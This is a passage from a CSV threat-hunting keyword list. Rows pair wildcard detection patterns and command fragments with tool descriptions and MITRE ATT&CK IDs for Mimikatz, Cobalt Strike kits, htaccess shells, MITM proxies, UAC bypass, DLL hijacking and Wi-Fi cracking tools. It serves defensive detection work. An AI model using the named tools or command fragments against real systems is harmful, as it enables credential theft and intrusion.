keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::regedit*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::sccm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::shadowcopies*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::skeleton*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::spooler*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::taskmgr*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::wp*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*misc::xor*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*miscbackdoorlnkhelp*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*missile-command.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*mitm6 --*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*mitm6 -d *,offensive_tool_keyword,mitm6,performs MiTM for IPv6,T1547 - T1557 - T1569 - T1562 - T1573,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/fox-it/mitm6,1,1,N/A,N/A,10,1478,229,2022-07-05T09:47:15Z,2018-01-10T21:27:28Z -*mitm6.py*,offensive_tool_keyword,mitm6,performs MiTM for IPv6,T1547 - T1557 - T1569 - T1562 - T1573,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/fox-it/mitm6,1,1,N/A,N/A,10,1478,229,2022-07-05T09:47:15Z,2018-01-10T21:27:28Z -*mitmdump -*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - 
T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*mitmdump -s aerosol.py*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*MITMf.py*,offensive_tool_keyword,MITMf,Framework for Man-In-The-Middle attacks,T1557 - T1192 - T1173 - T1185,TA0001 - TA0011 - TA0040,N/A,N/A,Sniffing & Spoofing,https://github.com/byt3bl33d3r/MITMf,1,1,N/A,N/A,10,3480,1090,2018-08-28T15:44:25Z,2014-07-07T11:13:51Z -*mitmproxy*,offensive_tool_keyword,mitmproxy,An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface,T1557 - T1553 - T1003 - T1556 - T1563,TA0002 - TA0009 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/mitmproxy/mitmproxy,1,1,N/A,N/A,10,32405,3799,2023-10-02T22:25:26Z,2010-02-16T04:10:13Z -*mitmsocks*,offensive_tool_keyword,mitmsocks4j,Man-in-the-middle SOCKS Proxy,T1557 - T1563 - T1559 - T1588,TA0007 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/Akdeniz/mitmsocks4j,1,0,N/A,N/A,1,30,9,2013-02-14T20:42:37Z,2013-02-10T21:33:52Z -*mitmsocks4j*,offensive_tool_keyword,mitmsocks4j,Man-in-the-middle SOCKS Proxy for Java,T1557 - T1563 - T1559 - T1588,TA0007 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/Akdeniz/mitmsocks4j,1,1,N/A,N/A,1,30,9,2013-02-14T20:42:37Z,2013-02-10T21:33:52Z -*mjnbclmflcpookeapghfhapeffmpodij*,greyware_tool_keyword,Ultrareach VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*mjolnodfokkkaichkcjipfgblbfgojpa*,greyware_tool_keyword,DotVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Mobile-Security-Framework*,offensive_tool_keyword,Mobile-Security-Framework,Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.,T1564 - T1592 - T1547 - T1562,TA0010 - TA0011 - TA0003 - TA0008,N/A,N/A,Frameworks,https://github.com/MobSF/Mobile-Security-Framework-MobSF,1,0,N/A,N/A,10,14942,3006,2023-10-03T20:48:09Z,2015-01-31T04:36:01Z -*Mobile-Security-Framework*,offensive_tool_keyword,Mobile-Security-Framework-MobSF,Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.,T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523,TA0007 - TA0010 - TA0003,N/A,N/A,Frameworks,https://github.com/MobSF/Mobile-Security-Framework-MobSF,1,1,N/A,N/A,10,14942,3006,2023-10-03T20:48:09Z,2015-01-31T04:36:01Z -*MockDirUACBypass*,offensive_tool_keyword,MockDirUACBypass,Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*MockDirUACBypassDll*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*Mockingjay_BOF.sln*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,1,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*Mockingjay_BOF-main*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,1,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*mod_auth_remote.phish.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_buster.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*mod_caucho.shell.htaccess*,offensive_tool_keyword,htshells,Self 
contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_cgi.shell.bash.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_cgi.shell.bind.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_cgi.shell.windows.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_mono.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_multi.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_nikto.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z 
-*mod_perl.embperl.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_perl.IPP.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_perl.Mason.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_perl.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_php.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_php.shell2.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_php.stealth-shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_python.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_rivet.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_ruby.shell.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_sendmail.rce.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*mod_shellshock.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*mod_wp_enum.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*modDetective*,offensive_tool_keyword,modDetective,modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent 
system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.,T1003 - T1036 - T1057,TA0005 - TA0007,N/A,N/A,Exploitation tools,https://github.com/itsKindred/modDetective,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,0,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,0,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*--mode com --acl --csv *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode com --procmon *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode dll --existing --pml *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode dll --procmon *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode proxy --action prototypes --path *prototypes.csv*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*--mode proxy --dll *.dll*--external-resources*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z 
-*--mode proxy --ghidra *--dll *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*ModifiedVulnerableBinaryFormatters\info.txt*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*Modlishka/config*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*MODLISHKA_BIN*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,0,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*Modlishka-linux-amd64*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation 